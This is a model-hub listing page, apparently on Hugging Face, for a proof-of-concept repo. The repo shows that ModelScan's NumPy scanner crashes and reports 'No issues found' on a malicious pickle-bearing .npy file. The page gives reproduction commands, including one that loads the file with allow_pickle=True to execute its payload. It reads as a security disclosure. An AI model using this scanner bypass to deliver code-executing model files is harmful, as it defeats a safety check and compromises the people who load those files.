Downloads · 30 days
0
Deneimaiegw/modelscan-npy-bypass-poc
modelscan-npy-bypass-poc is a machine learning model from Deneimaiegw. Use it for the machine learning task on the model card, and read the license before you ship it in a product.
These files contain proof-of-concept pickle payloads. Do NOT load in production environments.
Downloads · 30 days
0
Access
Public
Updated Apr 11, 2026
Repo size
415 B
Likes
0
Public
Click a slice to open those files.
.py8 KB · 73%
From the Hugging Face model README
These files contain proof-of-concept pickle payloads. Do NOT load in production environments.
ModelScan's scan_numpy function (in tools/picklescanner.py) uses internal NumPy APIs (_check_version, _read_array_header) that were removed in NumPy >=2.3.5. The scanner crashes with AttributeError and reports "No issues found" while the malicious file remains fully executable.
pip install modelscan numpy>=2.3.5
python3 simple_poc.py
modelscan -p malicious_model.npy # Reports "No issues found"
python3 -c "import numpy as np; np.load('malicious_model.npy', allow_pickle=True)" # Executes payload
cat /tmp/numpy_bypass_pwned.txt # Proof of execution